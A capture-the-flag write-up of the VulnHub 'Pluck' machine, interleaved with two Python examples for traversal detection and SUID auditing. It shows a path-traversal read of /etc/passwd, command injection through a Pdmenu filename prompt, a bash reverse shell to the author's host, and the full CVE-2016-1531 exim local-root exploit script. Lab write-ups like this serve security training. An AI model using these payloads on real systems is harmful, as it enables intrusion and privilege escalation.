Pluck
Location
https://download.vulnhub.com/pluck/pluck.ova.zip
Description
It’s the first boot2root from @ryanoberto.
Other than ‘enjoy’ there is not much of a description of the VM.
Getting started
Starting with a Sparta scan, which shows SSH, HTTP, MySQL and LLMNR.
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.171.4
+ Target Hostname:    192.168.171.4
+ Target Port:        80
+ Start Time:         2017-03-26 15:56:54 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2017-03-26 15:58:15 (GMT2) (81 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Several interesting finds with Nikto. I start with the path traversal vulnerability in ‘index.php?page=’ and use it to view the ‘/etc/passwd’ file.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
lxd:x:108:65534::/var/lib/lxd/:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:112:1::/var/cache/pollinate:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
Debian-exim:x:113:119::/var/spool/exim4:/bin/false
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
So ‘bob’, ‘peter’, ‘paul’ and ‘backup-user’. Both ‘paul’ and ‘backup-user’ have interesting login shells: ‘/usr/bin/pdmenu’ and ‘/usr/local/scripts/backup.sh’.
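The traversal Nikto flagged above, seen from the defender's side, as an added example that is not part of the original write-up: resolve_page is the confinement check the vulnerable index.php lacks, and flag_traversal runs the matching detection over constructed Apache access-log lines. The web root and the log lines are assumptions made for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Hypothetical web root of the vulnerable index.php?page= include (assumption).
WEB_ROOT = "/var/www/html"
# Constructed Apache access-log lines modelled on the traversal request above.
SAMPLE_LOG = [
    '192.168.171.3 - - [26/Mar/2017:15:57:01 +0200] "GET /index.php?page=about.php HTTP/1.1" 200 1234',
    '192.168.171.3 - - [26/Mar/2017:15:57:02 +0200] "GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1" 200 2410',
    '192.168.171.3 - - [26/Mar/2017:15:57:03 +0200] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2410',
    '192.168.171.3 - - [26/Mar/2017:15:57:04 +0200] "GET /images/ HTTP/1.1" 200 512',
]

def resolve_page(web_root, page):
    """Confinement check the vulnerable index.php lacks: the path 'page' resolves
    to, or None if it would leave web_root. normpath keeps this offline; on a
    live host also apply os.path.realpath so symlinks cannot escape either."""
    if "\x00" in page:
        return None  # a null byte would truncate the path inside PHP
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, page.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None

# A '..' segment, whether it follows a slash or a '=', '?' or '&' in the query.
TRAVERSAL = re.compile(r"(?:^|[/\\=?&])\.\.(?:[/\\]|$)")
SENSITIVE = ("/etc/", "/proc/self/")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def fully_decode(s, rounds=3):
    """URL-decode repeatedly so a double-encoded '%252e%252e%252f' is caught too."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def flag_traversal(log_lines):
    """(line_no, raw_request) for every request whose decoded path contains a
    '..' segment or points at a sensitive absolute path."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        path = fully_decode(m.group(1))
        if TRAVERSAL.search(path) or any(s in path for s in SENSITIVE):
            hits.append((n, m.group(1)))
    return hits
```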
When I use the same vulnerability as before I get the content of the ‘backup.sh’ file.
########################
# Server Backup script #
########################

#Backup directories in /backups so we can get it via tftp
echo "Backing up data"
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null
echo "Backup complete"
So there is a ‘backup.tar’ file, and the comment in the script says it is meant to be fetched via tftp. After downloading the file I extract it to see the content.
tftp> get 192.168.171.4:/backups/backup.tar
Received 1824718 bytes in 10.9 seconds
After examination I got the keys to Paul’s kingdom.
Like most keys, you need to find the one that fits the lock; after a few tries, the fourth one results in this.
Pdmenu
┌─────Main Menu─────┐
│ Directory listing │
│ Change directory  │
│ Edit file         │
│ Who's online?     │
│ WWW               │
│ Telnet            │
│ Ping              │
│                   │
│ Exit              │
└───────────────────┘
Welcome to Pdmenu 1.3.4 by Joey Hess <joey@kitenet.net>
‘Pdmenu’... I’ve seen that before. After some toying around I get to the ‘Edit file’ option.
When I type in the name of a file, I can alter that file. But because there is no (or at least very poor) input validation, I can chain additional commands onto the filename.
Pdmenu
┌─────Main Menu─────┐
│ Directory listing │
│ Change directory  │
│ Edit file         │
┌─────────────────────────────────filename?──────────────────────────────────┐
│ admin.php && id                                                            │
└────────────────────────────────────────────────────────────────────────────┘
│ Ping              │
│                   │
│ Exit              │
└───────────────────┘
Press Enter when done, or Esc to cancel
uid=1002(paul) gid=1002(paul) groups=1002(paul)
With this knowledge I use bash to call out to my local machine and create a reverse shell.
Pdmenu
┌─────Main Menu─────┐
│ Directory listing │
│ Change directory  │
│ Edit file         │
┌─────────────────────────────────filename?──────────────────────────────────┐
│ 1 && bash -c "bash -i >& /dev/tcp/192.168.171.3/31337 0>&1"                │
└────────────────────────────────────────────────────────────────────────────┘
│ Ping              │
│                   │
│ Exit              │
└───────────────────┘
Press Enter when done, or Esc to cancel
Listening on [0.0.0.0] (family 0, port 31337)
Connection from 192.168.171.4 38194 received!
paul@pluck:/home/bob$ id
id
uid=1002(paul) gid=1002(paul) groups=1002(paul)
A good way to start enumeration is to check which files have the SUID bit set. When a user executes such a file, the process runs with the file owner’s permissions, i.e. the owner’s UID (and, with the SGID bit, the owning group’s GID) instead of the caller’s. If there is a vulnerability in one of these programs, I may be able to escalate my privileges.
paul@pluck:/$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g
No clue what ‘/usr/exim/’ is, but after some Google wisdom I can tell it’s a Mail Transfer Agent. And lucky for me, there is an exploit available for this version.
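The SUID enumeration above in Python, as an added example that is not the author's code: find_suid reimplements ‘find / -perm -4000’, and unusual_suid and diff_baseline show how a defender sorts such a listing, which is exactly why the hand-installed exim under ‘/usr/exim/’ stands out. The standard-directory list is an assumption; the sample input is the find output from this page.

```python
import os
import stat

# Directories where a stock Ubuntu install keeps its setuid binaries
# (assumption for this example; build the list from your own baseline).
STANDARD_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/")

# The find output from this page, used as sample input.
PAGE_LISTING = (
    "/usr/exim/bin/exim-4.84-7 /usr/bin/passwd /usr/bin/at /usr/bin/newgrp "
    "/usr/bin/pkexec /usr/bin/sudo /usr/bin/traceroute6.iputils /usr/bin/newuidmap "
    "/usr/bin/chfn /usr/bin/gpasswd /usr/bin/newgidmap /usr/bin/chsh "
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 "
    "/usr/lib/s-nail/s-nail-privsep /usr/lib/openssh/ssh-keysign "
    "/usr/lib/eject/dmcrypt-get-device /bin/su /bin/umount /bin/mount "
    "/bin/fusermount /bin/ping /bin/ntfs-3g"
).split()

def find_suid(root="/"):
    """Equivalent of 'find / -perm -4000': regular files carrying the setuid
    bit; symlinks are not followed (lstat) and unreadable entries are skipped."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def unusual_suid(paths, standard_dirs=STANDARD_DIRS):
    """Setuid binaries that live outside the distribution's usual directories;
    these are the first ones to investigate (on this box: exim under /usr/exim)."""
    return [p for p in paths if not p.startswith(standard_dirs)]

def diff_baseline(current, baseline):
    """Compare a fresh listing with a recorded baseline -> (added, removed).
    A setuid file that appears between two runs is the classic artefact of a
    privilege-escalation attempt and deserves a look."""
    cur, base = set(current), set(baseline)
    return sorted(cur - base), sorted(base - cur)
```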
I create a bash script in ‘/tmp/’ and run it to escalate my privileges.
paul@pluck:/tmp/n13mant$ cat exim.sh
cat exim.sh
VE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
paul@pluck:/tmp/n13mant$ ./exim.sh
./exim.sh: 1: ./exim.sh: cannot open =: No such file
./exim.sh: 1: ./exim.sh: VE-2016-1531: not found
[ CVE-2016-1531 local root exploit
id
uid=0(root) gid=1002(paul) groups=1002(paul)
Now to get the flag.
cd /root
ls -lah
total 48K
drwx------  2 root root 4.0K Jan 25 13:28 .
drwxr-xr-x 23 root root 4.0K Jan 18 11:14 ..
-rw-------  1 root root    1 Jan 20 08:58 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
-rw-r--r--  1 root root  599 Jan 19 06:07 flag.txt
-rw-------  1 root root   84 Jan 20 09:00 .lesshst
-rw-------  1 root root   81 Jan 18 12:00 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root  11K Jan 25 13:28 .viminfo
-rw-r--r--  1 root root  209 Jan 18 19:40 .wget-hsts
cat flag.txt
Congratulations you found the flag
---------------------------------------
(ASCII-art logo omitted)
Conclusion
This was a fun first boot2root from this author. It had some nice features and I can’t wait for the next one. Keep up the good work!!!